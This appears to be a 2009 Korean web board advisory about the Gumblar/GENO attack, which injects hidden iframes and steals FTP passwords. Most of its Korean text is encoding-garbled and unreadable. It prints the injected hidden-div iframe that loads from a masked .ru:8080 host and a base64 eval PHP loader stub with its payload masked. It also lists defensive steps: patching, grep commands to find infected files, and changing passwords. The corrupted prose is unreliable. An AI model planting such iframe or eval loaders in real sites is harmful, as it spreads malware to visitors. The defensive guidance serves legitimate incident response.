¿ù°£ Àα⠰Խù°

°Ô½Ã¹° 111°Ç
   
FTP¿¡ ¿Ã¸± iframe »ðÀÔ ÇØÅ·(gumblar, GENO) / FTP ¾ÏÈ£ ¼öÁý ÇØÅ· ÆÁ
±Û¾´ÀÌ : ÃÖ°í°ü¸®ÀÚ ³¯Â¥ : 2009-12-02 (¼ö) 10:21 Á¶È¸ : 10311
±ÛÁÖ¼Ò :
                             

Áö±Ý ´ëºÎºÐÀÇ À¥¼­¹öµéÀº ¹«ÀÛÀ§ ºñ¹Ð¹øÈ£¸¦ ´ëÀÔÇÏ¿© ¾Ë¾Æ³»´Â ±âº»ÀûÀÎ ÇØÅ· ½Ãµµ(¿Ü±¹¿¡¼­ Çѱ¹À¸·Î ÇÏ·ç Æò±Õ ¼­¹ö´ç 1000ȸ Á¤µµ ¹ß»ý)¿Í Á¦·Îº¸µå ¿¾³¯¹öÀü µîÀÇ ¾÷·Îµå º¸¾È ¹ö±× µîÀ» È°¿ëÇÏ¿©,±¹³» ½ºÆÔ ¹ß¼Û ¾÷üµéÀÌ ½ºÆÔ ¸ÞÀÏ ¼­¹ö·Î µµ¿ëµÇ´Â °Íµµ »ó½Ã ¹ß»ýÇÏ´Â »óȲÀÔ´Ï´Ù.

ÀÌ µÎ°¡Áö´Â ¾î´À Á¤µµ ´ëó¸¦ ÇÏ°í ÀÖÁö¸¸(±âº»ÀûÀ¸·Î °í°´ÀÇ ÆÐÄ¡ ÀÛ¾÷), ¿äÁòÀº ÀüÇô ´ëóÇÒ ¼ö ¾ø´Â ÇØÅ·ÀÌ È£½ºÆþ÷°è¿¡¼­ ¹ß»ýµÇ°í ÀÖ½À´Ï´Ù. ±× ÇØÅ· ¹æ¹ýÀº ¹Ù·Î °³¹ßÀÚ°¡°¡ À¥»çÀÌÆ® ¼öÁ¤À» À§Çؼ­ FTP Á¢¼ÓÀ» ÇÏ´Â ¼ø°£, ±× ¾ÏÈ£¸¦ °¡·Îä¼­ ÇØÄ¿¿¡°Ô Àü¼ÛµÇ¾î ±× ¾ÏÈ£¸¦ °¡Áö°í ¾ÆÁÖ ½±°Ô ÇØÅ·ÇÏ´Â ¹æ¹ýÀÔ´Ï´Ù.

ÃÖ±Ù ¼ö°³¿ù µ¿¾È ´ÙÀ½°ú °°Àº <iframe> »ðÀÔ ÇØÅ·ÀÌ ¹æ´ëÇÏ°Ô ¹ß»ýµÇ°í ÀÖ´Â °ÍÀÔ´Ï´Ù.

<div style="display:none"><iframe src="http://???.ru:8080/index.php" width=235 height=558 ></iframe></div>

¸ñÀûÀº ƯÁ¤ »çÀÌÆ®ÀÇ DDOS °ø°Ý¿ëÀ̰ųª Áö¼ÓÀûÀ¸·Î ¾Ç¼ºÄڵ带 ¹èÆ÷ÇÏ´Â ±â´ÉÀ¸·Î »ç¿ëÇÏ°í, ±× ÇØÅ·ÀÇ ½ÃÀÛÀº À¥°³¹ßÀÚ°¡ À¥»çÀÌÆ® ¼öÁ¤À» À§ÇØ µå¸²À§¹ö³ª FTP ÇÁ·Î±×·¥À» ÀÌ¿ëÇؼ­ Á¢¼ÓÇÔÀ¸·Î½á ±× ¾ÏÈ£°¡ ÇØÄ¿¿¡°Ô ³Ñ¾î°¡´Â °Í °°½À´Ï´Ù.

ÀÌ°ÍÀº Gumblar(°Ëºí·¯) ȤÀº GENO¶ó°í ºÒ¸®´Â ¹æ¹ýÀ¸·Î, Gumblar ȤÀº GENO´Â ¾ÆÅ©·Îºª°ú Ç÷¡½¬ÀÇ º¸¾È ÆÐÄ¡°¡ µÇÁö ¾Ê´Â PC°¡ À§¿Í °°Àº ¾Ç¼º½ºÅ©¸³Æ®¿¡ ³ëÃâµÈ À¥»çÀÌÆ®¿¡ Á¢¼ÓÇÏ´Â °Í¸¸À¸·Î ÇØÅ·ÀÌ ¼º°øµÈ´Ù°í ÇÕ´Ï´Ù.

ÀÌ ¹æ¹ýÀº Adobe Reader Zero-day Ãë¾àÁ¡À̶ó ºÒ¸®±âµµ ÇÕ´Ï´Ù.

ÇöÀç±îÁö ³×À̹ö ¹«·á ¹é½ÅÀ» ±ò¾ÆµÎ¾îµµ ¿Ïº®ÇÏ°Ô °ËÃâÀ̳ª Ä¡·á°¡ µÇÁö´Â ¾Ê½À´Ï´Ù.

±×·±µ¥ ÃÖ±Ù¿¡ gifimg.php ÆÄÀϸíÀ¸·Î ´ÙÀ½°ú °°Àº Çü½ÄÀ¸·Î php Äڵ带 ¾÷·ÎµåÇÏ¿© ÇØÅ·À» ½ÃµµÇÏ´Â °Íµµ È®ÀεǾú½À´Ï´Ù.

<?php eval(base64_decode('????));?>



 
´ÙÀ½Àº Çʼö ½ÇÇà »çÇ× ÀÔ´Ï´Ù.

1. Ç÷¡½¬( Flash Player )¿Í ¾ÆÅ©·ÎºªÀ» ÃֽŹöÀüÀ¸·Î ÆÐÄ¡Çϱâ
     Ç÷¡½¬»çÀÌÆ®¿¡¼­ Flash Player ÃֽŹöÀüÀ¸·Î ´Ù½Ã ¼³Ä¡Çϼ¼¿ä ( ÃֽŠ¹öÀüÀϼö·Ï ÁÁ½À´Ï´Ù. )

2. ´ÙÀ½À¸·Î À¥»çÀÌÆ® º¯Á¶ ÆÄÀÏÀ» ¸ðµÎ ã±â
     °¡±ÞÀû linux command »ó¿¡¼­ ´ÙÀ½ÀÇ ¸í·É¾î·Î ÇÊÈ÷ ãÀ¸½Ã±â ¹Ù¶ø´Ï´Ù.
     find . -type f -exec grep -Hn ":8080/" {} \;
     find . -name "*.php*" -exec grep -Hn ":8080/" {} \;
     find . -name "*.htm*" -exec grep -Hn ":8080/" {} \;
     È¤Àº ÃÖ±Ù ÇÏ·ç(24½Ã°£) µ¿¾È º¯°æµÈ ÆÄÀϵéÀ» ã¾Æº¸´Â °Íµµ Çö¸íÇÑ ¹æ¹ý ÀÔ´Ï´Ù.
     find . -ctime -24
     Ã£À¸¼Ì´Ù¸é ¸ðµÎ »èÁ¦ÇØ Áֽñ⠹ٶø´Ï´Ù. ( ÆÄÀÏÀ» ÀÏÀÏÀÌ ¿­¾î¼­ ãÁö ¾ÊÀ¸¼Åµµ µË´Ï´Ù. )

3. ÀÚ±â ÄÄÇ»ÅÍ À¥ºê¶ó¿ìÀú ij½¬(tempÆÄÀϵé) ÆÄÀÏÀ» ºñ¿ì±â
     À¥ºê¶ó¿ìÀú´Â ij½¬¸¦ ¸ÕÀú Àаí À¥»çÀÌÆ®¸¦ Àб⠶§¹®¿¡, À¥»çÀÌÆ®°¡ Áö¿öÁ³³ª È®ÀÎÇÏ´Â °úÁ¤¿¡¼­ ´Ù½Ã ¹ÙÀÌ·¯½º°¡ µ¿ÀÛµÉ ¼ö ÀÖ´Ù. ( ¹°·Ð Ç÷¡½¬( Flash Player )¿Í ¾ÆÅ©·ÎºªÀ» ÃֽŹöÀüÀ¸·Î ÆÐÄ¡¸¦ È®½ÇÇÏ°Ô ÇÏ¿´°í ¹«·á¹é½Å ½Ç½Ã°£ °¨½Ã¸¦ µ¹¸®°í ÀÖÀ¸¸é °ÆÁ¤ÇÏÁö ¾ÊÀ¸¼Åµµ µË´Ï´Ù )

4. PC¹é½ÅÀ¸·Î °Ë»ç ÈÄ Á¢¼ÓÇÏ¿´´ø FTP ¾ÏÈ£¸¦ ¸ðµÎ ¹Ù²Ù±â

5. °¨¿° µÇ¾úÀ»¶§ÀÇ ºñ¹Ð¹øÈ£´Â ´Ù½Ã ¾²Áö ¾Ê±â
     ÀÌ¹Ì ±× ¾ÏÈ£´Â ÇØÄ¿µé¿¡°Ô ºñ¹Ð¹øÈ£ºÏDB¿¡ Æ÷ÇÔ½ÃÅ°°í ÇØÄ¿µé³¢¸® °øÀ¯Çϱ⿡, µÎ¹ø ´Ù½Ã ±× ºñ¹Ð¹øÈ£¸¦ »ç¿ëÇÏÁö ¸»¾Æ¾ß ÇÕ´Ï´Ù. ´Ù¸¥ ¼­¹ö, ´Ù¸¥ °èÁ¤, ´Ù¸¥ ¾ÆÀ̵𿡼­ ±× Æнº¿öµå ´ëÀÔÇØ º¸±â ¶§¹®ÀÔ´Ï´Ù.

 
Âü°í»çÀÌÆ®
ºí·Î±×1 : http://blog.naver.com/copynull?Redirect=Log&logNo=10067848943
ºí·Î±×2 : http://hummingbird.tistory.com/1017
ºí·Î±×3 : http://hummingbird.tistory.com/1049
¾Ë¾à : http://alyac.altools.co.kr/SecurityCenter/Analysis/NoticeView.aspx?id=1

À̸§ Æнº¿öµå
ºñ¹Ð±Û (üũÇÏ¸é ±Û¾´À̸¸ ³»¿ëÀ» È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù.)
¿ÞÂÊÀÇ ±ÛÀÚ¸¦ ÀÔ·ÂÇϼ¼¿ä.
   

 



 
»çÀÌÆ®¸í : ¸ðÁö¸®³× | ´ëÇ¥ : ÀÌ°æÇö | °³ÀÎÄ¿¹Â´ÏƼ : ·©Å°´åÄÄ ¿î¿µÃ¼Á¦(OS) | °æ±âµµ ¼º³²½Ã ºÐ´ç±¸ | ÀüÀÚ¿ìÆí : mojily°ñ¹ðÀÌchonnom.com Copyright ¨Ï www.chonnom.com www.kyunghyun.net www.mojily.net. All rights reserved.